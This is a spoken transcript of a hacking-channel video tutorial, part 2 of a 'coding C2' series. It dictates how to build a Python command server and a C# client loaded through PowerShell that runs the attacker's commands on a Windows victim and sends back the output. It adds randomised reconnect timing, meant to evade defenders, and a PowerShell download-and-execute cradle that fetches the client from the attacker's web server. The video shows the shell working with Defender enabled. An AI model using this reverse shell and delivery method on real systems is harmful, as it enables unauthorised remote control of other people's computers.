Hey guys, it's Elsek, and before we dive into the video of coding C2 part 2, I just want to mention that if you are enjoying the content of this channel, feel free to like this video, share, comment or subscribe to the channel. And I want to mention another thing that I am not responsible for the actions you perform with the code or techniques you see in my videos, so they are all for educational purposes. With that being said, let's dive into the video. Hey guys, and welcome back to the channel. This is the second part of the C2 series, and in that episode we're gonna reverse the connection from the first one. We're gonna upgrade the shell so it's no longer bind, but it's reverse. So we genuinely want to use reverse shell because it has more cons, more pros than cons, and one of them is that we do not have to deal with firewall, at least on that level, because we host ourselves the payload, the server, and the clients connect to us. When the client wants to host something, they require far more privileges and far more firewall rules in order to host it successfully. So when we are speaking about shells and so on, this is a thing that is good to take a consideration of. So now we want to go ahead and create a reverse shell. We're going to use the command VM for our victim box, and we're going to use our Kali server, our attacker box, and this is going to be our server, and this is going to be our client. In the previous episode, it was quite the reverse, quite the opposite. And here on the code, when we inspect it, we can see that we listen on all interfaces on port 8443. And now all these things gonna get into Kali. The Kali is gonna be the server and so on. So let's get right into it. The first thing I want to test out is if that code is actually gonna get executed inside the Kali VM. So I'm gonna copy that code right here. Actually, I'm gonna copy the whole code. I'm gonna go to Kali and let's make a new directory cc, cd into cc, and let's go ahead and create new file, server.ps1. Now here I'm gonna paste my code, and I'm gonna use Powershell, which is pretty much PowerShell core for all kind of distros. They make it not relying only on Windows, they make it for all other distros, including Linux and Mac, and they call it Posh. So I'm not sure if I say it correctly, but bear with me. So I'm gonna try to execute that server.ps1 using PowerShell core, and we get an error as I expected because Windows is using its own APIs and systems and devel files, and so we most likely cannot call exactly the same code using Windows and Linux. And the more complex it gets, the harder it begins to be called on both operational systems. So I'm sure if we go ahead and try to convert that code into Linux one, it's gonna work. But this is going to be a lot of time wasted since we can use a white edition like Python. So the point here is that when we're talking about networking and communications, they all talk with bytes. They are all sending bytes, and it doesn't really matter what language you're going to use on the server or on the client side end. So for example, we're going to code our server using Python, and we're going to code our client using PowerShell and C Sharp respectively, and it's gonna work because they send and receive quite the same packets. It's no matter if the server is gonna be C, C++, Python, Java, so on, or the client can be any other language. Since it accepts the connection, since if it has the libraries of creating and engaging with the networks, it should work in theory. So now let's get right into it. Let's first remove our server.ps1, and now let's code, use Visual Studio Code, server.py. So make sure to have your Python module installed. You can install it by creating a simple py file and the pop-up should appear here, or simply go to extensions and type Python. So yeah, there is your Python extension. This pretty much gives syntax highlighting and many more things. So I think it has an debugger, but yeah, no, never mind. So here what we're gonna have to do is to first create a server, make that server accepts a connection, and after that, since the make a server, make that server accept a connection, then create a command variable, then send that command variable to the client and receive the output. So we have 5 steps. So let's get right into it. We're going to import socket because we need to engage with the network sockets. Then we're going to define our host and ports. So host equals 4 zeros. As the previous example, we are just translating all that bunch of code we write in the previous episode to here using Python. Then we're going to specify our port equals 443. And yes, now we can use pretty much whatever port we want, because now when the server is hosted on the attacker box, we can do as many firewalls through we want. So it's not a problem at all of allowing that specific port to be opened. So yeah, we can pretty much do whatever we want. Now we should actually listen to our socket, to our port using that host or interfaces. So it's done with socket inet, I believe it was that, and then socket dot stream, yeah, sock stream, okay, and then ss, and then here we need to actually bind to the host and port. So s.bind host port, and the syntax is using two pair of brackets. So now the next thing is to actually listen to that host and port, yeah, and then what we need to do. So far we defined our host, our port, and we bind it to to the socket. And now we need to create a while loop when we're gonna accept a connection. And upon connection is being accepted, we need to define a variable, instantiate that variable, generate a command inside, then send it over the network and receive the output. So now let's start to define our while loop. So while we call while true. So that pretty much means an infinite loop. And now we can print something to know where something is going on with our application. So I'm gonna go ahead with listening. Then I'm gonna need to con and addr equals c dot accept. So we're gonna force our socket to accept the connection. And upon connection is being accepted, so with con, so now we enter this piece of code, this lines of code 13 and below, when the connection is being accepted. So here I can print that something happened, connected by ADDR. So we know from who we actually got the connection. And then I need to define my command variable. So cmd equals input and something. For example, enter cmd. Yeah. Okay, and then I need to append a new line terminator to it. So cmd equals cmd plus new line, just to make our code a little bit clearer and easier to read on runtime. And then I need to define a variable which is going to be our encoded string, and that variable needs to be sent over the network. So here I need to pretty much encode it in byte array, because when we're talking about networks, it's either we're sending bytes when we're talking about TCP, and when we're talking about web interaction APIs, we are sending XML or JSON. So we need to stick to the rules. So I'm going to define a variable cmd request, and this we're going to be equals cmd.encode. Now we have a byte array, and then connect.sendAll and specify the cmd requests. Now we need to define our response data. So here pretty much we generate a command and we send it over to the connected host. And now I can define data equals con.receive and 1024, and then I can print the data. So data is going to be our output. Let's just call it output for better understanding. Output, yeah, and here output. Okay, or actually cmd output is going to sound better. I'm so bad with names, apologize. Yeah, cmd output equals con receive, and we're going to print cmd output. So pretty much our server is ready now. What we do is listen to the O interface on port 443. We actively listen for connections. When connection come, we print connected. We generate a variable command. We encode it using byte array. We encode it to byte array. we send it to the client and receive the output and print the output. So now we can test our thing using netcat. Keep in mind that I'm using a command VM, and command has a lot of built-in tools, which one is ncat. So I can simulate client with ncat, and then when we know our server is working just fine, we can go ahead and dive into C# and create a client code for ourselves. So I'm gonna go ahead, open a terminal here, and go to cdcc, therefore python server.py. Yeah, and keep in mind that Kali, the newest Kali version, by default is running Python 3. So if you're using older version of Kali, you may be running Python 2. I think that this piece of code should run equally, almost equally on Python 2 and Python 3 besides the printing statement, but I'm just not sure. Just make sure you stick to Python 3 because Python 2 is no longer be supported. So I'm gonna exit that and run our server again. So I'm gonna go to my commando and ncat, we have it, ncat 2168 126 128 if I'm not wrong, 443 nv. So I think we have a connection. Yeah, we have connection, and now I can enter some command, for example, who am I, and on the client side we can receive the who am I, so we can successfully confirm that our server is working as we want. And then let's simulate some action. For example, we want to return lsec. And now let's go to the Kali box and we see lsec as a response. So that B here means we receive the byte array, but don't worry about it. Since it's our server on our side, we can do pretty much whatever we want. We can decode it to string, send it somewhere. Just I leave it that to you guys to decide how to upgrade from that point on. So for now, I'm going to leave it to on by the way, and we confirm that our server is working. So I'm going to shut that thing off, and we can focus on developing a client-side code. So I'm going to open Visual Studio again. Yeah. And what I'm going to do is to comment all of our previously done code. Yeah. And here I'm going to go ahead and create a new method, which is going to be public static void actually. Yeah, void, and let's call it connect, and we're gonna pass string server. So we're gonna dynamically assign IP address of our server, so it's kind of easier to use. So here we're gonna need to define once again our port, so in 32 port equals 443. Then we're gonna need to define our TCP client again, TCP, pretty much quite the same steps as the first one. Yeah, actually Visual Studio Code's doing the job for me. So then we're gonna go ahead and define our network stream, network stream. Come on, VS Code. No, we can do it. Okay, never mind. Stream equals new network stream. Okay. And now we need a few variables. One to be the data as bytes. One needs to be a string for that decoded bytes, and one needs to be a data for a bytes for responding back. So let's first go ahead and create our data to be new byte. So this data variable is going to hold our command requested from the server. So here we should read it, but first let's define another variable, string response, or actually let's call it cmd. Yeah, cmd equals string.empty. Now we need to actually read the bytes we received from the server. And why are you red? Actually, I think I missed something. Yeah, I think we missed the connection. So here we need to specify the server and the port. Yep. And now on the network stream, what did I miss? Oh, yeah, it's not the way it works. So as far as I remember, new network stream. Ah, yeah, client guest stream. Yeah, that was the syntax. So we can go ahead and client dot, come on, get stream. That should be fine. Yeah, my bad. Okay, that should be fine. Nice. So now we need to actually read, as I mentioned, the request from the server. So here I'm gonna go ahead and type int32 bytes equals stream.read method. We're gonna specify data 0 data.length. So pretty much the same thing we did in the previous episode. So now we pretty much have the data being written into that bytes variable. So now our CMD variable is going to equals to system text encoder ASCII, I believe, encoding, no, encoding ASCII, and then get string, and we're going to specify data 0 bytes. So now we should have a string variable which represents the decoded value of the received connection, received command. Now, just to make sure something is going on, I can console write line, write line, our response. So CMD goes here, and then I can then go ahead and execute what we received. So var output, or CMD output, actually CMD output equals to exec CMD. So exec is our method we read from the previous episode, that one right here. So what it does, it pretty much executes a command and returns an output in a string. And now we're gonna get that string, encode it in bytes, and then return that into our server. So we're gonna define another byte array. We call it message. Quite the same thing as we did the previous time. System.text.encoding. Yeah, ASCII get bytes this time. The previous time we called get string, now we call get bytes and specify CMD output. Thank you, Visual Studio. And then we need to send it over the stream. So stream.write message 0 and message.length. Yeah, nice. And we need, the last thing we need to do is to close the connection. So stream.close and TCP client.close. Yeah, that's it. So far what we did is to instantiate a new TCP server. We created several variables to represent several things. So first the variable represents the bytes we receive from the server. The second variable is that decoded variable in string. And then we read the data, we assign it to a CMD, execute the CMD. So we call the exec method to execute the command we received from our server, and then we return the output. So in theory, this should work. So let's go ahead in our main method and let's test that out. So I'm gonna call connect and specify our IP address 126.128, yeah. And let's see what happens. So here I'm gonna once again run my Python server. Here on the command VM, I'm just gonna run the PowerShell code. Sorry, the C# code. Later it's gonna become PowerShell. And we see a blank terminal, which is quite good. Now here we have listening connected by the IP address, and let's see if I type who am I received a commando lsec. So we can confirm our reverse shell pretty much works. Now, the only issue is that we need to make this thing repeatable. So as you can see, it cuts off the first connection because that's the way we built it. The code does things we say it to do. So we said just execute that one time and that's it. So we're gonna put that thing inside a while loop. So while true, let's put that thing inside. And let's go thread.sleep, let's say 5 seconds. Okay, so now let's test that code once again. I'm gonna restart our environment. Okay, it's listening. Let's go ahead and run the code and let's see what happens. Now, again, I'm connected. Who am I? Command lsec. Now it's waiting. And after 5 seconds, yeah, we have another prompt. Let's go, for example, with ipconfig. Nice. So our reverse shell is completely working. So let's see what happens if I go ahead and shoot an invalid command. We just received nothing, which is good. I was expecting an exception. We have it here. We have an error message here, but no exception or no code interruption whatsoever. And if I go ahead with the real command once again, yeah, it works. Nice. Nice. Okay, so let's stop the process. Yeah, nice. So our next part is gonna be to move that code into PowerShell, host it inside our Kali, and do quite the same thing we did in the previous episode. So let's first go ahead and create that variable random so our code randomly sends a connection request. And that's the point with that is it's been kind of harder to catch because if our code is requesting a connection every, let's say, 5 seconds, it's been easier to detect by rules, by boot teamers, and so on. So let's go ahead and create a new method. So private int integer, oh, and why it's not, oh, maybe because I'm out of scope of the namespace. Yeah, I want it to be here. So private int, yeah, it's okay. Private int get random seconds, yeah, and now random rand equals new random, and then var seconds equals rand dot next, and we're gonna specify, let's say, for the sake of testing, I'm gonna specify 10 seconds. So this 10,000, when we're gonna translate it to thread sleep, as you can see here we have 5,000, that means 5 seconds. So the maximum number we can get here is 10 seconds, and that's just for the testing purpose. You can customize that code as much as you want. So go ahead and create and return, actually return run next. Yeah, that looks fine. I'm gonna finish my syntax, and here I can go ahead and create to generate new second. So var seconds equals, what was it, bad with names, get random seconds. I'm gonna make it public. Yeah, that should be fine. Static, yeah, we don't need an object for that method. So we define our seconds to be random, we connect to our server, and then we wait that number of seconds. So that should be it. Now we need to translate all that code into PowerShell, host it inside our KVM, and see how it behaves. So now I do not need that, just to make our code a little bit simpler and easier to read. I'm gonna copy all of my code and let's test it once again if it's working. So I'm gonna open up my server. I'm gonna go inside PowerShell and let's go ahead and create new variable called code equals our piece of code and close the syntax, and then add type code, and we get an error. Name thread does not exist in the current context, and that's because we need to add a library using, what was it, thread system.threading. I'm not sure if it's that, but it's worth giving a try. So let's go over the procedure one more time. At type code. Yeah, now it's fine. And the reason why it's saying it's not using threading, it's because I explained in the previous video, it's getting it from anywhere else. It maybe it can be a DLL file, it can be basically anything. So yeah, but we need that for our PowerShell code because there are no DLL files there, and we need the raw code to access in Windows APIs in order to get that method from. So that's by adding system threading, we resolve that issue. And now let's try and call in that thing again. So ix, what was it? cc dot program and main. We have a blank screen which looks good, so most likely we received the connection. So here, let's go ahead and type who am I. Yeah, we are good to go. So now it was pretty fast. Let's do a couple of commands to see if our timeout works really. Who am I? Seems the same to me. Yeah, now yeah, okay. So it's working. Okay. Yeah, Control C doesn't work. Breaks the terminal. No worries. Yeah, so since we have that, we can go ahead, copy this piece of code, go ahead to our Kali box and create, let's see, I'm gonna go here and create client.ps1. I'm gonna paste that code here and let's host it with Python 3 and HTTP server 80. So now the only thing we need to do is to go into our PowerShell and remotely run and execute the script from the web. So let's go ahead and do that. I'm gonna go to Commando, open up a new PowerShell, and let's go for the command syntax. So PowerShell, no profile, C, IEX, new object, net.webclient, download string, HTTP, my IP address 126.128. It's so hard to remember these things. And the file name was, what was it? Client.ps1, I believe. Yeah. Then finish our syntax and see if that thing works. So now let's make sure our web server is being hosted. Nice. And let's make sure our server is running, which was not. Yeah. So by running that command, we should first make a request to our AT server, our Python server, read and load the script into memory, and then execute it towards our listener. And that's not the case, which is odd, and it's not odd. I forgot to finish the PowerShell script there. So here I need to vim client.ps1, and here I need to go to the beginning and do it in PowerShell because now it's just C#. Yeah, I'm already sleeping. So code equals that giant piece of thing, and then we can add type code, and we can ix cc program main. So now it should work in theory. Well, let's see what happens. So let's have our Python server running once again, our listener running once again, and let's run the exact same command once again. And we received what we expected, a blank screen. So if I go here, we can see that a request is being made to that client.ps1 and our listener is being triggered. So now I can run as many commands as I want and Have a nice video. PowerShell, Python, C Sharp, PowerShell. Yeah. So let's once again test it on our fresh new Windows victim box. So I have Defender turned on, and now I'm gonna close that. I've prepared the command. On the curly box, I set up our server again and our listener again. So here, I'm gonna go ahead, run the command. Nothing happened so far, which is a good sign. But nothing happened on the other side, which is not that good sign. Yeah, there it is, the request, and our listener is being triggered. So I can go ahead and type who am I again, and ipconfig again. Yeah, so that's how it works. That's how the reverse shell works. We transitioned from bind to reverse shell. We added a timeout, and we created somewhat of a C2 channel. I hope you guys enjoyed. I hope you guys learned something new. Feel free to post what you think in the comments, like that video, and see you in the next one.